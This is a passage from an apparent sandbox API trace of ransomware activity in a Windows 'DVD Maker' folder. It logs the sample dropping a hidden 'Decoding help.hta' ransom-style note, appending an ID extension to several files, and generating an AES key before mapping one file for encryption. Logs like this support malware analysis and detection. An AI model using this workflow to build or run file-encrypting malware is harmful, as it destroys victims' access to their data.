ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 0 [0039.049] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 31 os_tid = 0xab0 [0039.025] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\*.*", lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5430 [0039.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.026] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.026] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.026] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.026] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0039.026] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.026] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0xffffffff [0039.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.026] WriteFile (in: hFile=0x1e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x440fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.027] CloseHandle (hObject=0x1e0) returned 1 [0039.027] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.027] lstrcmpiW (lpString1="Decoding help.hta", lpString2="audiodepthconverter.ax") returned 1 [0039.027] lstrlenW (lpString="audiodepthconverter.ax") returned 22 [0039.027] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.028] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="audiodepthconverter.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" [0039.028] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" [0039.028] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.047] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499cc441, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x499cc441, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1303c, dwReserved0=0x0, dwReserved1=0x0, cFileName="bod_r.TTF", cAlternateFileName="")) returned 1 [0039.047] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.048] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.048] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bod_r.TTF") returned 1 [0039.048] lstrlenW (lpString="bod_r.TTF") returned 9 [0039.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.048] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="bod_r.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" [0039.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" [0039.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF.[ID]g9uZrLhJaygpwRm1[ID]" [0039.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.056] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0ed7565, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="directshowtap.ax", cAlternateFileName="")) returned 1 [0039.056] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.056] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.056] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.056] lstrcmpiW (lpString1="Decoding help.hta", lpString2="directshowtap.ax") returned -1 [0039.056] lstrlenW (lpString="directshowtap.ax") returned 16 [0039.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="directshowtap.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" [0039.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" [0039.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.057] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ae6642, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc9ae6642, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xe1601f60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x227600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVDMaker.exe", cAlternateFileName="")) returned 1 [0039.057] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.057] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DVDMaker.exe") returned -1 [0039.057] lstrlenW (lpString="DVDMaker.exe") returned 12 [0039.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="DVDMaker.exe" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" [0039.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" [0039.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.057] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.057] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.057] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.057] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.058] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US" [0039.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*.*" [0039.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x40e80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.065] CloseHandle (hObject=0x1e0) returned 1 [0039.065] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd559b52d, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd559b52d, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xddb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Eurosti.TTF", cAlternateFileName="")) returned 1 [0039.065] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.065] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Eurosti.TTF") returned -1 [0039.065] lstrlenW (lpString="Eurosti.TTF") returned 11 [0039.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Eurosti.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" [0039.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" [0039.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF.[ID]g9uZrLhJaygpwRm1[ID]" [0039.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.066] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="fieldswitch.ax", cAlternateFileName="")) returned 1 [0039.066] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.066] lstrcmpiW (lpString1="Decoding help.hta", lpString2="fieldswitch.ax") returned -1 [0039.066] lstrlenW (lpString="fieldswitch.ax") returned 14 [0039.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="fieldswitch.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" [0039.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" [0039.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.076] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e4410c0, ftCreationTime.dwHighDateTime=0x1d4c029, ftLastAccessTime.dwLowDateTime=0xd7c6a5a0, ftLastAccessTime.dwHighDateTime=0x1d4ae00, ftLastWriteTime.dwLowDateTime=0xd7c6a5a0, ftLastWriteTime.dwHighDateTime=0x1d4ae00, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="maximize.exe", cAlternateFileName="")) returned 1 [0039.076] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.076] lstrcmpiW (lpString1="Decoding help.hta", lpString2="maximize.exe") returned -1 [0039.076] lstrlenW (lpString="maximize.exe") returned 12 [0039.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="maximize.exe" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe") returned="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe" [0039.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe") returned="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe" [0039.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe" (normalized: "c:\\program files\\dvd maker\\maximize.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\maximize.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.077] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\maximize.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.077] CreateFileMappingA (hFile=0x1a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x188 [0039.077] CryptAcquireContextA (in: phProv=0x440fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x440fcec*=0x5a7c68) returned 1 [0039.078] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x440fce8 | out: phKey=0x440fce8*=0x5a52f0) returned 1 [0039.078] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x440fbe4, pdwDataLen=0x440fce4 | out: pbData=0x440fbe4*, pdwDataLen=0x440fce4*=0x2c) returned 1 [0039.078] MapViewOfFile (hFileMappingObject=0x188, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 